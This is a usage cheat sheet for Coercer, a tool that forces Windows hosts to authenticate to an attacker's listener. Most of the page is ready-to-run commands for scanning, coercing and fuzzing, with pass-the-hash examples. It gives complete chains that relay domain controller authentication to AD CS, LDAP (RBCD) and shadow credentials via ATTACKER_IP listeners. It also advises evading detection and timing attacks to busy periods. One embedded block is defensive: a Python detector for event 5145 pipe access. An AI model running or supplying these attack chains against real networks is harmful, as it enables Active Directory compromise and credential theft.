Coercer

Coercer is a Python tool that automates Windows authentication coercion attacks by triggering NTLM authentication from target machines to an attacker-controlled listener. It supports multiple coercion methods including PetitPotam, PrinterBug, DFSCoerce, and ShadowCoerce, enabling NTLM relay attacks for AD privilege escalation.

Installation

Via pip

pip install coercer

From GitHub

git clone https://github.com/p0dalirius/Coercer.git
cd Coercer
pip install -r requirements.txt
python3 -m coercer --help

Requirements

  • Python 3.8+
  • impacket
  • pycryptodomex
  • requests
  • argparse

Quick Start

Basic coercion with credentials:

coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

Scan target to identify working methods:

coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

Coerce with NTLM hash:

coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d DOMAIN

Coercion Methods

Coercer supports numerous coercion methods across different MS-RPC protocols and Windows services:

Method                 | Service           | Protocol         | MS-RPC Interface | Impact
PetitPotam             | EfsRpc            | \\pipe\efsrpc    | EfsRpc           | High - SYSTEM auth
PrinterBug             | Spooler           | \\pipe\spoolss   | Printer (RPC)    | High - SYSTEM auth
DFSCoerce              | MSDFS             | \\pipe\netdfs    | NetDFS           | Medium - SYSTEM auth
ShadowCoerce           | Shadow Copy VSS   | \\pipe\vssadmin  | FSRVP            | Medium - SYSTEM auth
MSEFSRCoerce           | EFSRPC            | \\pipe\efsrpc    | EfsRpc           | High - SYSTEM auth
Webexec                | WebClient         | HTTP             | IOCTL            | Medium - User context
DFSCoerceRPC           | MSDFS             | \\pipe\netdfs    | NetDFS           | Medium - SYSTEM auth
RprRemoteFindFirstFile | RemoteRegistry    | \\pipe\winreg    | RemoteRegistry   | Low - Registry read
EfsRpcOpenFileRaw      | EfsRpc            | \\pipe\efsrpc    | EfsRpc           | High - SYSTEM auth
Lsasrv                 | LSA               | \\pipe\lsarpc    | LSA              | Medium - LSASS auth
Tssession              | Terminal Services | \\pipe\tssession | TermSrv          | Low - TS context
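As an added defender-side example (not part of the Coercer project or this page's original content), the pipe-to-method mapping in the table above can drive a detection over Windows Security event 5145 (network share object access) records: IPC$ access to one of the listed pipes is the footprint a coercion attempt, or a `coercer scan` walking several pipes from one host, leaves on the target. The event records are constructed samples; field names follow the 5145 event data names, and the threshold for calling a source "scanning" is an assumption.

```python
import json

# Named-pipe -> coercion methods, taken from the method table above
# (Webexec uses HTTP rather than a named pipe, so it is not listed here).
COERCION_PIPES = {
    "efsrpc": ["PetitPotam", "MSEFSRCoerce", "EfsRpcOpenFileRaw"],
    "spoolss": ["PrinterBug"],
    "netdfs": ["DFSCoerce", "DFSCoerceRPC"],
    "vssadmin": ["ShadowCoerce"],
    "winreg": ["RprRemoteFindFirstFile"],
    "lsarpc": ["Lsasrv"],
    "tssession": ["Tssession"],
}

# Constructed sample records shaped like Security event 5145 (network share
# object access), one JSON object per line; hosts and users are made up.
SAMPLE_EVENTS = r"""
{"EventID": 5145, "SubjectUserName": "jdoe", "IpAddress": "192.168.1.100", "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "efsrpc"}
{"EventID": 5145, "SubjectUserName": "jdoe", "IpAddress": "192.168.1.100", "ShareName": "\\\\*\\Finance", "RelativeTargetName": "Q3\\budget.xlsx"}
{"EventID": 5145, "SubjectUserName": "svc-print", "IpAddress": "192.168.1.100", "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "spoolss"}
{"EventID": 5145, "SubjectUserName": "backup", "IpAddress": "192.168.1.7", "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "srvsvc"}
"""

def classify_event(event):
    """Methods a single record could indicate: IPC$ access to a known coercion pipe."""
    if event.get("EventID") != 5145:
        return []
    if not event.get("ShareName", "").upper().endswith("IPC$"):
        return []
    pipe = event.get("RelativeTargetName", "").lower().lstrip("\\")
    return COERCION_PIPES.get(pipe, [])

def find_coercion_attempts(jsonl):
    """Return (source_ip, user, pipe, methods) for every record that hits the pipe list."""
    hits = []
    for line in filter(str.strip, jsonl.splitlines()):
        event = json.loads(line)
        methods = classify_event(event)
        if methods:
            hits.append((event["IpAddress"], event["SubjectUserName"],
                         event["RelativeTargetName"].lower(), methods))
    return hits

def scanning_sources(hits, threshold=2):
    """Source IPs that touched at least `threshold` distinct coercion pipes (scan-like)."""
    pipes_per_ip = {}
    for ip, _user, pipe, _methods in hits:
        pipes_per_ip.setdefault(ip, set()).add(pipe)
    return sorted(ip for ip, pipes in pipes_per_ip.items() if len(pipes) >= threshold)
```

Auditing of the IPC$ share must be enabled (Object Access / Detailed File Share) for 5145 to be generated at all; srvsvc and other routine pipes are deliberately not in the map, so ordinary share enumeration does not fire.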

Scan Mode

Enumerate which coercion methods work without triggering full authentication:

# Scan all methods
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# Scan with NTLM hash
coercer scan -t 192.168.1.50 -u domain\\user -H HASH -d DOMAIN

# Filter by method name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-method PetitPotam

# Filter by protocol
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-protocol EfsRpc

# Filter by pipe name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-pipe-name efsrpc

# Scan with timeout per method
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 10

Coerce Mode

Trigger actual NTLM authentication to the listener:

# Basic coercion to listener
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# Coerce specific method
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --method PetitPotam

# Coerce with output verbosity
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -v

# Coerce to alternative port
coercer coerce -l 192.168.1.100:4444 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# Coerce with timeout
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 30

Fuzz Mode

Discover new coercion methods by fuzzing RPC endpoints:

# Fuzz target to discover methods
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100

# Fuzz with specific pipe
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --pipe efsrpc

# Fuzz with timeout
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --timeout 30

Authentication Options

Username/Password Authentication

coercer coerce -l LISTENER -t TARGET -u domain\\username -p password -d DOMAIN
coercer coerce -l LISTENER -t TARGET -u username -p password -d DOMAIN

NTLM Hash Authentication (Pass-the-Hash)

coercer coerce -l LISTENER -t TARGET -u domain\\username -H LM:NTLM -d DOMAIN
coercer coerce -l LISTENER -t TARGET -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

Kerberos Authentication

coercer coerce -l LISTENER -t TARGET -k -d DOMAIN
export KRB5CCNAME=/tmp/user.ccache
coercer coerce -l LISTENER -t TARGET -k

No Authentication

coercer coerce -l LISTENER -t TARGET --no-pass
coercer scan -t TARGET --no-pass

Local Authentication

coercer coerce -l LISTENER -t TARGET --local

Listener Setup

Using ntlmrelayx (SMB Relay)

# Terminal 1: Start ntlmrelayx
ntlmrelayx.py -t 192.168.1.60 --no-http-server -smb2support

# Terminal 2: Run coercer
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

Using Responder (LLMNR/NBT-NS)

# Terminal 1: Start Responder
responder -I eth0 -v

# Terminal 2: Run coercer with SMB relay
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

Custom SMB Server Listener

# Using impacket smbserver
smbserver.py -smb2support -ip 192.168.1.100 share /tmp

# Run coercer to relay
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

Listening on Specific Port

coercer coerce -l 192.168.1.100:445 -t TARGET -u domain\\user -p password -d DOMAIN

Common Attack Chains

Coerce to ntlmrelayx → AD CS ESC8

# Terminal 1: Start ntlmrelayx targeting ADCS
ntlmrelayx.py -t http://dc.domain.local/certsrv/certfnsh.asp -template DomainController --no-http-server -smb2support

# Terminal 2: Coerce to relay
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAIN

Coerce to ntlmrelayx → LDAP for RBCD

# Terminal 1: Start ntlmrelayx for LDAP relay with RBCD
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --delegate-access

# Terminal 2: Coerce target
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAIN

Coerce to Relay for Shadow Credentials

# Terminal 1: Start ntlmrelayx targeting LDAP
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --shadow-credentials

# Terminal 2: Trigger coercion
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAIN

Coerce Machine Account to Relay for Privilege Escalation

# Scan first to find working method
coercer scan -t DC_IP -u domain\\user -p password -d DOMAIN

# Coerce DC to listener for relay to ADCS
coercer coerce -l ATTACKER_IP -t DC_IP -u domain\\user -p password -d DOMAIN --method PetitPotam

WebDAV Coercion

Force HTTP authentication instead of SMB for cross-protocol relay attacks:

# Enable WebDAV coercion (requires WebClient service running)
coercer coerce -l http://ATTACKER_IP:80 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# WebDAV with custom path
coercer coerce -l http://ATTACKER_IP:8080/share -t TARGET -u domain\\user -p password -d DOMAIN

# Combine with HTTP listener on ntlmrelayx
ntlmrelayx.py -I http://ATTACKER_IP:8080 -t http://target.com --no-smb-server

coercer coerce -l http://ATTACKER_IP:8080 -t TARGET -u domain\\user -p password -d DOMAIN

Filtering Options

Filter by Method Name

# Only PetitPotam
coercer scan -t TARGET -u domain\\user -p password --filter-method PetitPotam

# Multiple methods
coercer scan -t TARGET -u domain\\user -p password --filter-method "PetitPotam|PrinterBug"

Filter by Protocol Name

# Only EfsRpc protocol
coercer scan -t TARGET -u domain\\user -p password --filter-protocol EfsRpc

# Multiple protocols
coercer scan -t TARGET -u domain\\user -p password --filter-protocol "EfsRpc|NetDFS"

Filter by Pipe Name

# Only efsrpc pipe
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name efsrpc

# Multiple pipes
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name "efsrpc|netdfs"

Combine Filters

coercer scan -t TARGET -u domain\\user -p password -d DOMAIN \
  --filter-method PetitPotam \
  --filter-protocol EfsRpc

Troubleshooting

Target Unreachable

# Verify connectivity
ping TARGET_IP

# Test SMB connectivity (smbclient takes the credentials as -U 'user%password')
smbclient -L //TARGET_IP -U 'domain\user%password'

# Test with timeout
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN --timeout 30

Authentication Failed

# Verify credentials
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v

# Try alternative username format
coercer scan -t TARGET -u DOMAIN\\user -p password -d DOMAIN

# Use NTLM hash instead
coercer scan -t TARGET -u domain\\user -H HASH -d DOMAIN

Service Not Available

# Some methods require specific services running
# Check if MSDFS, Spooler, or EfsRpc services are active
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v

# Try with timeout increase
coercer coerce -l LISTENER -t TARGET -u domain\\user -p password -d DOMAIN --timeout 60

No Working Methods Found

# Method may be patched or disabled
# Try scanning with verbose output
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v

# Enumerate installed hotfixes
wmic qfe list brief /format:list

Listener Connection Issues

# Verify listener is running and accessible
telnet LISTENER_IP 445

# Check firewall rules
sudo ufw allow 445/tcp

# Use verbose logging
coercer coerce -l LISTENER_IP -t TARGET -u domain\\user -p password -d DOMAIN -v

Best Practices

  1. Always Scan First: Use coercer scan to identify working methods before triggering full coercion
  2. Use Specific Methods: Target known-working methods to avoid noise and detection
  3. Filter Results: Leverage filtering to reduce network activity and operational footprint
  4. Combine with Relay: Pair Coercer with ntlmrelayx or Responder for effective privilege escalation
  5. Monitor Logs: Coercion attempts generate security event logs; operate during high activity periods
  6. Patch Management: Target systems with outdated patches are more likely to support multiple methods
  7. Service Enumeration: Verify target services (Spooler, EfsRpc, MSDFS) are running before coercion
  8. Credential Handling: Use NTLM hashes or Kerberos tickets to avoid passing plaintext credentials
  9. Clean Relay Chains: Ensure ntlmrelayx or relay tool is properly configured before coercing
  10. Documentation: Log all coercion attempts, timing, and results for post-exploitation analysis

Tool               | Purpose
PetitPotam         | Standalone EfsRpc coercion tool; foundation for Coercer
ntlmrelayx         | NTLM relay framework to authenticate against other services
Responder          | LLMNR/NBT-NS poisoning and relay tool
Certipy            | Active Directory Certificate Services enumeration and exploitation
krbrelayx          | Kerberos relay attacks and alternative authentication methods
SpoolSample        | Standalone PrinterBug implementation
PrintNightmare     | RCE exploit for CVE-2021-1675 via Print Spooler
Shadow Credentials | Credential dumping via shadow credentials in Active Directory